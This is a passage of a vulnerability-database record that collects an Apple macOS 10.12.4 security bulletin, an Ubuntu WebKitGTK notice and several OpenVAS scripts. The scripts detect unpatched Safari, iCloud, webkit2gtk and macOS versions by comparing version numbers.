4.9.0.\n\nCVE-2016-7922\n\nCVE-2016-7923\n\nCVE-2016-7924\n\nCVE-2016-7925\n\nCVE-2016-7926\n\nCVE-2016-7927\n\nCVE-2016-7928\n\nCVE-2016-7929\n\nCVE-2016-7930\n\nCVE-2016-7931\n\nCVE-2016-7932\n\nCVE-2016-7933\n\nCVE-2016-7934\n\nCVE-2016-7935\n\nCVE-2016-7936\n\nCVE-2016-7937\n\nCVE-2016-7938\n\nCVE-2016-7939\n\nCVE-2016-7940\n\nCVE-2016-7973\n\nCVE-2016-7974\n\nCVE-2016-7975\n\nCVE-2016-7983\n\nCVE-2016-7984\n\nCVE-2016-7985\n\nCVE-2016-7986\n\nCVE-2016-7992\n\nCVE-2016-7993\n\nCVE-2016-8574\n\nCVE-2016-8575\n\nCVE-2017-5202\n\nCVE-2017-5203\n\nCVE-2017-5204\n\nCVE-2017-5205\n\nCVE-2017-5341\n\nCVE-2017-5342\n\nCVE-2017-5482\n\nCVE-2017-5483\n\nCVE-2017-5484\n\nCVE-2017-5485\n\nCVE-2017-5486\n\n**tiffutil**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in AKCmds to version 4.0.7.\n\nCVE-2016-3619\n\nCVE-2016-9533\n\nCVE-2016-9535\n\nCVE-2016-9536\n\nCVE-2016-9537\n\nCVE-2016-9538\n\nCVE-2016-9539\n\nCVE-2016-9540\n\nmacOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite includes the security content of [Safari 10.1](<https://support.apple.com/kb/HT207600>).\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: August 29, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0736", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2161", "CVE-2016-3619", "CVE-2016-4688", "CVE-2016-5387", "CVE-2016-5636", "CVE-2016-7056", "CVE-2016-7585", "CVE-2016-7922", "CVE-2016-7923", "CVE-2016-7924", "CVE-2016-7925", "CVE-2016-7926", "CVE-2016-7927", "CVE-2016-7928", "CVE-2016-7929", "CVE-2016-7930", "CVE-2016-7931", "CVE-2016-7932", "CVE-2016-7933", "CVE-2016-7934", "CVE-2016-7935", "CVE-2016-7936", "CVE-2016-7937", "CVE-2016-7938", "CVE-2016-7939", "CVE-2016-7940", "CVE-2016-7973", "CVE-2016-7974", "CVE-2016-7975", "CVE-2016-7983", "CVE-2016-7984", "CVE-2016-7985", "CVE-2016-7986", "CVE-2016-7992", "CVE-2016-7993", "CVE-2016-8574", "CVE-2016-8575", "CVE-2016-8740", "CVE-2016-8743", "CVE-2016-9533", "CVE-2016-9535", "CVE-2016-9536", "CVE-2016-9537", "CVE-2016-9538", "CVE-2016-9539", "CVE-2016-9540", "CVE-2016-9586", "CVE-2016-9935", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-5029", "CVE-2017-5202", "CVE-2017-5203", "CVE-2017-5204", "CVE-2017-5205", "CVE-2017-5341", "CVE-2017-5342", "CVE-2017-5482", "CVE-2017-5483", "CVE-2017-5484", "CVE-2017-5485", "CVE-2017-5486", "CVE-2017-6974", "CVE-2017-7070"], "modified": "2017-03-27T00:00:00", "id": "APPLE:E8FF9F04ED54DD8E8D5B899FB4A8000E", "href": "https://support.apple.com/kb/HT207615", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T12:14:22", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of service \nattacks, and arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-10T00:00:00", "type": "ubuntu", "title": "WebKitGTK+ vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2367", "CVE-2017-2396", "CVE-2017-2454", "CVE-2017-2466", "CVE-2017-2415", "CVE-2017-2395", "CVE-2016-9643", "CVE-2017-2377", "CVE-2017-2471", "CVE-2017-2445", "CVE-2017-2468", "CVE-2017-2376", "CVE-2017-2386", "CVE-2017-2469", "CVE-2017-2364", "CVE-2017-2455", "CVE-2016-9642", "CVE-2017-2446", "CVE-2017-2459", "CVE-2017-2457", "CVE-2017-2481", "CVE-2017-2405", "CVE-2017-2447", "CVE-2017-2394", "CVE-2017-2464", "CVE-2017-2419", "CVE-2017-2465", "CVE-2017-2460", "CVE-2017-2476", "CVE-2017-2442", "CVE-2017-2433", "CVE-2017-2470", "CVE-2017-2475", "CVE-2017-2392"], "modified": "2017-04-10T00:00:00", "id": "USN-3257-1", "href": "https://ubuntu.com/security/notices/USN-3257-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:34:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3257-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9643", "CVE-2017-2442", "CVE-2017-2395", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2376", "CVE-2017-2419", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2392", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2445", "CVE-2017-2476"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843130", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843130", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for webkit2gtk USN-3257-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843130\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-11 06:33:11 +0200 (Tue, 11 Apr 2017)\");\n script_cve_id(\"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2364\", \"CVE-2017-2367\",\n \"CVE-2017-2376\", \"CVE-2017-2377\", \"CVE-2017-2386\", \"CVE-2017-2392\", \"CVE-2017-2394\",\n \"CVE-2017-2395\", \"CVE-2017-2396\", \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\",\n \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\", \"CVE-2017-2447\",\n \"CVE-2017-2454\", \"CVE-2017-2455\", \"CVE-2017-2457\", \"CVE-2017-2459\", \"CVE-2017-2460\",\n \"CVE-2017-2464\", \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\",\n \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\",\n \"CVE-2017-2481\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3257-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\n discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\n into viewing a malicious website, a remote attacker could exploit a variety of\n issues related to web browser security, including cross-site scripting attacks,\n denial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 16.10,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3257-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3257-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:20", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "Apple Safari Multiple Vulnerabilities-HT207600", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9643", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2395", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2419", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310810727", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810727", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities-HT207600\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810727\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2364\", \"CVE-2017-2367\",\n \"CVE-2017-2377\", \"CVE-2017-2378\", \"CVE-2017-2385\", \"CVE-2017-2386\",\n \"CVE-2017-2389\", \"CVE-2017-2394\", \"CVE-2017-2395\", \"CVE-2017-2396\",\n \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\", \"CVE-2017-2424\",\n \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\",\n \"CVE-2017-2447\", \"CVE-2017-2453\", \"CVE-2017-2454\", \"CVE-2017-2455\",\n \"CVE-2017-2459\", \"CVE-2017-2460\", \"CVE-2017-2463\", \"CVE-2017-2464\",\n \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\",\n \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\",\n \"CVE-2017-2479\", \"CVE-2017-2480\", \"CVE-2017-2481\", \"CVE-2017-7071\");\n script_bugtraq_id(94554, 94559, 95725, 97130, 97129, 97136, 97143, 97176, 97133,\n 100613);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 16:41:59 +0530 (Fri, 31 Mar 2017)\");\n script_name(\"Apple Safari Multiple Vulnerabilities-HT207600\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple memory corruption issues,\n\n - A state management issue,\n\n - A spoofing and denial-of-service issue existed in the handling\n of HTTP authentication,\n\n - A spoofing issue existed in the handling of FaceTime prompts,\n\n - A keychain handling issue in keychain item management,\n\n - A prototype access issue in exception handling,\n\n - Multiple memory corruption issues in input validation,\n\n - Multiple memory corruption issues in memory handling,\n\n - A type confusion issue in memory handling,\n\n - An access issue existed in Content Security Policy,\n\n - An uncontrolled resource consumption issue in regex processing,\n\n - An information disclosure issue existed in the processing of OpenGL shaders,\n\n - A memory corruption issue in input validation,\n\n - Multiple validation issues existed in the handling of page loading,\n\n - A validation issue existed in the handling of page loading,\n\n - A logic issue existed in the handling of frame objects,\n\n - A logic issue existed in the handling of strict mode functions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to disclose sensitive information and can also lead to arbitrary\n code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 10.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 10.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207600\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\npath = infos['location'];\n\n\nif(version_is_less(version:safVer, test_version:\"10.1\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"10.1\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:20:34", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "openvas", "title": "Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310810983", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810983", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810983\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-2493\", \"CVE-2017-2480\", \"CVE-2017-2479\", \"CVE-2017-2463\",\n \"CVE-2017-5029\", \"CVE-2017-2383\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-16 14:51:38 +0530 (Tue, 16 May 2017)\");\n script_name(\"Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A validation issue existed in element handling.\n\n - Multiple memory corruption issues.\n\n - Poor certificate handling.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code, track a user's activity and exfiltrate\n data cross-origin.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 6.2\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 6.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207607\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!icVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:icVer, test_version:\"6.2\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"6.2\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:22", "description": "This host is running Apple Mac OS X and\n is prone to multiple memory corruption vulnerabilities.", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Memory Corruption Vulnerabilities-HT207615", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5029", "CVE-2017-2432"], "modified": "2019-05-03T00:00:00", "id": "OPENVAS:1361412562310810994", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810994", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Memory Corruption Vulnerabilities-HT207615\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810994\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2017-2432\", \"CVE-2017-5029\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-19 11:40:15 +0530 (Fri, 19 May 2017)\");\n script_name(\"Apple Mac OS X Multiple Memory Corruption Vulnerabilities-HT207615\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple memory corruption vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to multiple memory\n corruption issues due to insufficient input validation and poor memory\n handling.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code and perform an out of bounds memory write.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.3, 10.11.x through 10.11.6 and 10.10.x through 10.10.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade Apple Mac OS X 10.12.x to 10.12.4\n or apply the appropriate security patch for Apple Mac OS X 10.11.x and 10.10.x. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207615\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[0-2]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[0-2]\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\n# if 10.11.x before 10.11.6 is running, update to 10.11.6 first and then apply patch\n# if 10.10.x before 10.10.5 is running, update to 10.10.5 first and then apply patch\nif(osVer =~ \"^10\\.1[01]\")\n{\n if(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\") ||\n version_in_range(version:osVer, test_version:\"10.10\", test_version2:\"10.10.4\")){\n fix = \"Upgrade to 